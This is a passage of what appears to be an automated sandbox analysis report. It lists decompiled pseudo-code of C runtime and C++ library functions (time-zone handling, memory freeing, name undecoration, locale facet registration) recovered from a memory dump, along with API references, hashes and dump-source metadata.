								E6DE1CBD3( *0x6de97a08);
								 *0x6de97a08 = 0;
								 *_t194 = 0x6de97a18;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x6de97a18 * 0x3c;
									_t168 =  *0x6de97a6c; // 0x0
									_push(_t171);
									 *0x6de97a10 = 1;
									_v12 = _t150;
									__eflags =  *0x6de97a5e; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t168 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x6de97ab2; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x6de97ac0; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t168) * 0x3c;
										}
									}
									_t176 = E6DE13CD0(0, _t168);
									_t99 = WideCharToMultiByte(_t176, 0, 0x6de97a1c, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x6de97a70, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E6DE28225()) = _v12;
								 *((intOrPtr*)(E6DE28219())) = _v16;
								_t96 = E6DE2821F();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t169 =  *0x6de97a08; // 0x0
					_t178 = _a4;
					if(_t169 == 0) {
						L12:
						E6DE1CBD3(_t169);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x6de28b6d
						_t170 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t170 + 1; // 0x6de28b6e
						 *0x6de97a08 = E6DE1F26D(_t154 - _t170, _t13);
						_t116 = E6DE1CBD3(0);
						_t167 =  *0x6de97a08; // 0x0
						if(_t167 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x6de28b6d
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x6de28b6e
							_t119 = E6DE1AB60(_t167, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E6DE33B33(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E6DE1BFB3(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E6DE1BFB3(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E6DE1BFB3(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E6DE28225()) = _v8;
										_t128 = E6DE28219();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E6DE33B33(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t169;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L83;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L83:
			}

APIs

_free.LIBCMT ref: 6DE287FE
_free.LIBCMT ref: 6DE28822
_free.LIBCMT ref: 6DE289A9
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6DE42130), ref: 6DE289BB
WideCharToMultiByte.KERNEL32(00000000,00000000,6DE97A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6DE28A33
WideCharToMultiByte.KERNEL32(00000000,00000000,6DE97A70,000000FF,?,0000003F,00000000,?), ref: 6DE28A60
_free.LIBCMT ref: 6DE28B75

Strings

0!m, xrefs: 6DE28964, 6DE2896A
0!m, xrefs: 6DE28AD8

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: 0!m$0!m
API String ID: 314583886-1395855498
Opcode ID: fc0798f7a58f31eec03917c3a57df51edd7e1e78e110218f9ff5888b1f589c77
Instruction ID: 6c0ac9293a12044febf22a318ea25a186f8d35227dc3de8f94cf8bdc56e01876
Opcode Fuzzy Hash: fc0798f7a58f31eec03917c3a57df51edd7e1e78e110218f9ff5888b1f589c77
Instruction Fuzzy Hash: E7C11872A08646ABDB15DF68CCC0BBA7BB9EF42318F35459ED594AB340EF309A41C750

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1D3EF, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE1D3EF(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x6de40c10) {
					E6DE1CBD3(_t52);
					_t26 = _a4;
				}
				E6DE1CBD3( *((intOrPtr*)(_t26 + 0x3c)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x30)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x34)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x38)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x28)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x2c)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x40)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x44)));
				E6DE1CBD3( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E6DE1D23E(5,  &_v8);
				_v8 =  &_a4;
				return E6DE1D28E(4,  &_v8);
			}

APIs

_free.LIBCMT ref: 6DE1D403

Part of subcall function 6DE1CBD3: HeapFree.KERNEL32(00000000,00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000), ref: 6DE1CBE9
Part of subcall function 6DE1CBD3: GetLastError.KERNEL32(00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000,00000000), ref: 6DE1CBFB

_free.LIBCMT ref: 6DE1D40F
_free.LIBCMT ref: 6DE1D41A
_free.LIBCMT ref: 6DE1D425
_free.LIBCMT ref: 6DE1D430
_free.LIBCMT ref: 6DE1D43B
_free.LIBCMT ref: 6DE1D446
_free.LIBCMT ref: 6DE1D451
_free.LIBCMT ref: 6DE1D45C
_free.LIBCMT ref: 6DE1D46A

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 282e8f461a055616628fc03499b5de85ea263430c2ef734941c22ca926dc9e16
Instruction ID: d9edc1809316870a3ed422901aa4486066c6c3ea266e4efc7386ebba4b5d0681
Opcode Fuzzy Hash: 282e8f461a055616628fc03499b5de85ea263430c2ef734941c22ca926dc9e16
Instruction Fuzzy Hash: 8C11967574D10CAFCB01DF54CC41DEA7BB5EF0465CB2244A9BA08CF222DB75EA609B80

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF70E2, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6DDF70E2(void* __ecx, void* __edx, signed int* _a4) {
				intOrPtr _v8;
				char _v12;
				char* _t18;
				unsigned int _t23;
				char* _t26;
				intOrPtr* _t29;
				intOrPtr* _t30;
				unsigned int _t33;
				char* _t36;
				signed int* _t38;
				void* _t41;
				intOrPtr _t47;
				intOrPtr _t50;

				_t18 =  *0x6de97218; // 0x0
				_t41 =  *_t18 - 0x58;
				if(_t41 == 0) {
					 *0x6de97218 = _t18 + 1;
					_push("void");
					goto L16;
				} else {
					if(_t41 == 0) {
						 *0x6de97218 = _t18 + 1;
						_t23 =  *0x6de97220; // 0x0
						_t26 = "...";
						if(( !(_t23 >> 0x12) & 0x00000001) == 0) {
							_t26 = "<ellipsis>";
						}
						_push(_t26);
						L16:
						E6DDF5A6C(_a4);
						goto L17;
					} else {
						E6DDF6FEC(__edx,  &_v12);
						_t50 = _v8;
						if(_t50 != 0) {
							L11:
							_t29 = _a4;
							 *_t29 = _v12;
							 *((intOrPtr*)(_t29 + 4)) = _t50;
							return _t29;
						} else {
							_t30 =  *0x6de97218; // 0x0
							_t47 =  *_t30;
							if(_t47 == 0) {
								goto L11;
							} else {
								if(_t47 == 0x40) {
									 *0x6de97218 = _t30 + 1;
									goto L11;
								} else {
									if(_t47 == 0x5a) {
										 *0x6de97218 = _t30 + 1;
										_t33 =  *0x6de97220; // 0x0
										_t36 = ",...";
										if(( !(_t33 >> 0x12) & 0x00000001) == 0) {
											_t36 = ",<ellipsis>";
										}
										E6DDF5EB7( &_v12, _a4, _t36);
										L17:
										return _a4;
									} else {
										_t38 = _a4;
										_t38[1] = _t38[1] & 0x00000000;
										 *_t38 =  *_t38 & 0x00000000;
										_t38[1] = 2;
										return _t38;
									}
								}
							}
						}
					}
				}
			}

0x6ddf70e7
0x6ddf70ef
0x6ddf70f2
0x6ddf7195
0x6ddf719a
0x00000000
0x6ddf70f8
0x6ddf70fc
0x6ddf7174
0x6ddf7179
0x6ddf7185
0x6ddf718a
0x6ddf718c
0x6ddf718c
0x6ddf7191
0x6ddf719f
0x6ddf71a2
0x00000000
0x6ddf70fe
0x6ddf7102
0x6ddf7107
0x6ddf710d
0x6ddf7166
0x6ddf7166
0x6ddf716c
0x6ddf716e
0x6ddf7172
0x6ddf710f
0x6ddf710f
0x6ddf7114
0x6ddf7118
0x00000000
0x6ddf711a
0x6ddf711d
0x6ddf7161
0x00000000
0x6ddf711f
0x6ddf7122
0x6ddf7135
0x6ddf713a
0x6ddf7146
0x6ddf714b
0x6ddf714d
0x6ddf714d
0x6ddf7159
0x6ddf71a7
0x6ddf71ab
0x6ddf7124
0x6ddf7124
0x6ddf7127
0x6ddf712b
0x6ddf712e
0x6ddf7133
0x6ddf7133
0x6ddf7122
0x6ddf711d
0x6ddf7118
0x6ddf710d
0x6ddf70fc

APIs

UnDecorator::getArgumentList.LIBVCRUNTIME ref: 6DDF7102

Part of subcall function 6DDF6FEC: Replicator::operator[].LIBVCRUNTIME ref: 6DDF7058
Part of subcall function 6DDF6FEC: DName::operator+=.LIBVCRUNTIME ref: 6DDF7060

DName::operator+.LIBCMT ref: 6DDF7159
DName::DName.LIBVCRUNTIME ref: 6DDF71A2

Strings

,..., xrefs: 6DDF7146
..., xrefs: 6DDF7185
<ellipsis>, xrefs: 6DDF718C, 6DDF7191
void, xrefs: 6DDF719A
,<ellipsis>, xrefs: 6DDF714D, 6DDF7152

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: 2a419ba5b2262823f830bb24568bb31b344ce016c1d56ca59315062b67d560fc
Instruction ID: 5b78ae6ad6309a0c7ceff77a7cef83534c2bb41d0b9053d3230f00f11fc974ce
Opcode Fuzzy Hash: 2a419ba5b2262823f830bb24568bb31b344ce016c1d56ca59315062b67d560fc
Instruction Fuzzy Hash: 242147B0A15205BFDB04EF18D490BBA3BF0BB06358F129159F845CB262CB35DA4ACB94

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD777F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDD777F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				void* _v16;
				char _v20;
				char _v32;
				void* _t19;
				intOrPtr* _t20;
				intOrPtr* _t42;
				void* _t50;

				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653( &_v20, 0);
				_t50 =  *0x6de96c10; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t50;
				_t19 = E6DDB161C(0x6de96b2c);
				_t38 = _a8;
				_t20 = E6DDB171B(_a8, _t19);
				_t48 = _t20;
				if(_t20 != 0) {
					L5:
					E6DDD66BA( &_v20);
					return E6DDF0075(_t48);
				} else {
					if(_t50 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6DDD7E4C(__ebx, _t38, __edx, _t48, _t50) - 0xffffffff;
						if(__eflags == 0) {
							_t42 =  &_v32;
							E6DDB1438(_t42);
							E6DDF3D74( &_v32, 0x6de93504);
							asm("int3");
							 *_t42 = _v0;
							return _t42;
						} else {
							_t48 = _v16;
							_v16 = _t48;
							_v4 = 1;
							E6DDD6FD3(__eflags, _t48);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t48 + 4))))();
							 *0x6de96c10 = _t48;
							goto L5;
						}
					} else {
						_t48 = _t50;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDD7786
std::_Lockit::_Lockit.LIBCPMT ref: 6DDD7790
int.LIBCPMT ref: 6DDD77A7

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

codecvt.LIBCPMT ref: 6DDD77CA
std::_Facet_Register.LIBCPMT ref: 6DDD77E1
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDD7801
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD781F

Strings

,km, xrefs: 6DDD779B

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: ,km
API String ID: 2594415655-221775841
Opcode ID: a7ebba5eeb919b8d978ed161998b363207f0859abccb9604b15745a8e7b1d8f0
Instruction ID: 02b8303f6611af074d1def079d5f5471ae2eb880c7707a0a31c82de0fb6d1ee1
Opcode Fuzzy Hash: a7ebba5eeb919b8d978ed161998b363207f0859abccb9604b15745a8e7b1d8f0
Instruction Fuzzy Hash: 5211E275D08219FBCF01FBA4C840ABEB7B5AF44718F220449F511AB290DFB0AA05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDEEEB, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDEEEB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t321;
				signed int _t322;
				void* _t334;
				void* _t347;
				void* _t360;
				void* _t373;
				void* _t386;
				void* _t399;
				void* _t412;
				void* _t425;
				void* _t438;
				void* _t451;
				void* _t464;
				void* _t477;
				void* _t490;
				void* _t503;
				void* _t516;
				void* _t529;
				void* _t542;
				void* _t555;
				void* _t568;
				void* _t581;
				void* _t594;
				signed int _t853;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				signed int _t952;
				signed int _t953;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				signed int _t957;
				signed int _t958;
				signed int _t959;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				void* _t990;

				_t920 = __edx;
				_t699 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t990 - 0x14, 0);
				_t945 =  *0x6de96e04; // 0x0
				 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
				 *(_t990 - 0x10) = _t945;
				_t321 = E6DDB161C(0x6de96b30);
				_t702 =  *((intOrPtr*)(_t990 + 8));
				_t322 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t321);
				_t922 = _t322;
				if(_t322 != 0) {
					L5:
					E6DDD66BA(_t990 - 0x14);
					return E6DDF0075(_t922);
				} else {
					if(_t945 == 0) {
						_push( *((intOrPtr*)(_t990 + 8)));
						_push(_t990 - 0x10);
						__eflags = E6DDE0C9D(__ebx, _t702, __edx, _t922, _t945) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t990 - 0x20);
							E6DDF3D74(_t990 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t922, _t945, 0x14);
							E6DDD6653(_t990 - 0x14, 0);
							_t946 =  *0x6de96de4; // 0x0
							 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
							 *(_t990 - 0x10) = _t946;
							_t334 = E6DDB161C(0x6de96d90);
							_t709 =  *((intOrPtr*)(_t990 + 8));
							_t923 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t334);
							__eflags = _t923;
							if(_t923 != 0) {
								L12:
								E6DDD66BA(_t990 - 0x14);
								return E6DDF0075(_t923);
							} else {
								__eflags = _t946;
								if(_t946 == 0) {
									_push( *((intOrPtr*)(_t990 + 8)));
									_push(_t990 - 0x10);
									__eflags = E6DDE0D03(_t699, _t709, __edx, _t923, _t946) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t990 - 0x20);
										E6DDF3D74(_t990 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t699, _t923, _t946, 0x14);
										E6DDD6653(_t990 - 0x14, 0);
										_t947 =  *0x6de96db4; // 0x0
										 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
										 *(_t990 - 0x10) = _t947;
										_t347 = E6DDB161C(0x6de96d68);
										_t716 =  *((intOrPtr*)(_t990 + 8));
										_t924 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t347);
										__eflags = _t924;
										if(_t924 != 0) {
											L19:
											E6DDD66BA(_t990 - 0x14);
											return E6DDF0075(_t924);
										} else {
											__eflags = _t947;
											if(_t947 == 0) {
												_push( *((intOrPtr*)(_t990 + 8)));
												_push(_t990 - 0x10);
												__eflags = E6DDE0DA5(_t699, _t716, __edx, _t924, _t947) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t990 - 0x20);
													E6DDF3D74(_t990 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t699, _t924, _t947, 0x14);
													E6DDD6653(_t990 - 0x14, 0);
													_t948 =  *0x6de96dd4; // 0x0
													 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
													 *(_t990 - 0x10) = _t948;
													_t360 = E6DDB161C(0x6de96b28);
													_t723 =  *((intOrPtr*)(_t990 + 8));
													_t925 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t360);
													__eflags = _t925;
													if(_t925 != 0) {
														L26:
														E6DDD66BA(_t990 - 0x14);
														return E6DDF0075(_t925);
													} else {
														__eflags = _t948;
														if(_t948 == 0) {
															_push( *((intOrPtr*)(_t990 + 8)));
															_push(_t990 - 0x10);
															__eflags = E6DDE0E47(_t699, _t723, _t920, _t925, _t948) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t990 - 0x20);
																E6DDF3D74(_t990 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t699, _t925, _t948, 0x14);
																E6DDD6653(_t990 - 0x14, 0);
																_t949 =  *0x6de96de8; // 0x0
																 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																 *(_t990 - 0x10) = _t949;
																_t373 = E6DDB161C(0x6de96d94);
																_t730 =  *((intOrPtr*)(_t990 + 8));
																_t926 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t373);
																__eflags = _t926;
																if(_t926 != 0) {
																	L33:
																	E6DDD66BA(_t990 - 0x14);
																	return E6DDF0075(_t926);
																} else {
																	__eflags = _t949;
																	if(_t949 == 0) {
																		_push( *((intOrPtr*)(_t990 + 8)));
																		_push(_t990 - 0x10);
																		__eflags = E6DDE0EB7(_t699, _t730, _t920, _t926, _t949) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t990 - 0x20);
																			E6DDF3D74(_t990 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t699, _t926, _t949, 0x14);
																			E6DDD6653(_t990 - 0x14, 0);
																			_t950 =  *0x6de96db8; // 0x0
																			 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																			 *(_t990 - 0x10) = _t950;
																			_t386 = E6DDB161C(0x6de96d6c);
																			_t737 =  *((intOrPtr*)(_t990 + 8));
																			_t927 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t386);
																			__eflags = _t927;
																			if(_t927 != 0) {
																				L40:
																				E6DDD66BA(_t990 - 0x14);
																				return E6DDF0075(_t927);
																			} else {
																				__eflags = _t950;
																				if(_t950 == 0) {
																					_push( *((intOrPtr*)(_t990 + 8)));
																					_push(_t990 - 0x10);
																					__eflags = E6DDE0F1F(_t699, _t737, _t920, _t927, _t950) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t990 - 0x20);
																						E6DDF3D74(_t990 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t699, _t927, _t950, 0x14);
																						E6DDD6653(_t990 - 0x14, 0);
																						_t951 =  *0x6de96dec; // 0x0
																						 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																						 *(_t990 - 0x10) = _t951;
																						_t399 = E6DDB161C(0x6de96d98);
																						_t744 =  *((intOrPtr*)(_t990 + 8));
																						_t928 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t399);
																						__eflags = _t928;
																						if(_t928 != 0) {
																							L47:
																							E6DDD66BA(_t990 - 0x14);
																							return E6DDF0075(_t928);
																						} else {
																							__eflags = _t951;
																							if(_t951 == 0) {
																								_push( *((intOrPtr*)(_t990 + 8)));
																								_push(_t990 - 0x10);
																								__eflags = E6DDE0F87(_t699, _t744, _t920, _t928, _t951) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t990 - 0x20);
																									E6DDF3D74(_t990 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t699, _t928, _t951, 0x14);
																									E6DDD6653(_t990 - 0x14, 0);
																									_t952 =  *0x6de96dbc; // 0x0
																									 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																									 *(_t990 - 0x10) = _t952;
																									_t412 = E6DDB161C(0x6de96d70);
																									_t751 =  *((intOrPtr*)(_t990 + 8));
																									_t929 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t412);
																									__eflags = _t929;
																									if(_t929 != 0) {
																										L54:
																										E6DDD66BA(_t990 - 0x14);
																										return E6DDF0075(_t929);
																									} else {
																										__eflags = _t952;
																										if(_t952 == 0) {
																											_push( *((intOrPtr*)(_t990 + 8)));
																											_push(_t990 - 0x10);
																											__eflags = E6DDE0FEF(_t699, _t751, _t920, _t929, _t952) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t990 - 0x20);
																												E6DDF3D74(_t990 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t699, _t929, _t952, 0x14);
																												E6DDD6653(_t990 - 0x14, 0);
																												_t953 =  *0x6de96df0; // 0x0
																												 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																												 *(_t990 - 0x10) = _t953;
																												_t425 = E6DDB161C(0x6de96d9c);
																												_t758 =  *((intOrPtr*)(_t990 + 8));
																												_t930 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t425);
																												__eflags = _t930;
																												if(_t930 != 0) {
																													L61:
																													E6DDD66BA(_t990 - 0x14);
																													return E6DDF0075(_t930);
																												} else {
																													__eflags = _t953;
																													if(_t953 == 0) {
																														_push( *((intOrPtr*)(_t990 + 8)));
																														_push(_t990 - 0x10);
																														__eflags = E6DDE1057(_t699, _t758, _t920, _t930, _t953) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t990 - 0x20);
																															E6DDF3D74(_t990 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t699, _t930, _t953, 0x14);
																															E6DDD6653(_t990 - 0x14, 0);
																															_t954 =  *0x6de96dc0; // 0x0
																															 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																															 *(_t990 - 0x10) = _t954;
																															_t438 = E6DDB161C(0x6de96d74);
																															_t765 =  *((intOrPtr*)(_t990 + 8));
																															_t931 = E6DDB171B( *((intOrPtr*)(_t990 + 8)), _t438);
																															__eflags = _t931;
																															if(_t931 != 0) {
																																L68:
																																E6DDD66BA(_t990 - 0x14);
																																return E6DDF0075(_t931);
																															} else {
																																__eflags = _t954;
																																if(_t954 == 0) {
																																	_push( *((intOrPtr*)(_t990 + 8)));
																																	_push(_t990 - 0x10);
